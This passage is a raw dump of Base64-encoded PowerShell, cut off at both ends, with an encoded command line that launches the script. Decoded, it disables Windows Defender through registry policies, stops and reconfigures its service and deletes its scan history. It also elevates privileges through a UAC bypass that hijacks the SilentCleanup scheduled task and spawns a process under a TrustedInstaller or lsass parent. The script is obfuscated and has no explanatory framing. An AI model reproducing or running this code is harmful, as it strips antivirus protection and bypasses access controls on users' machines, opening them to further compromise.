AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBs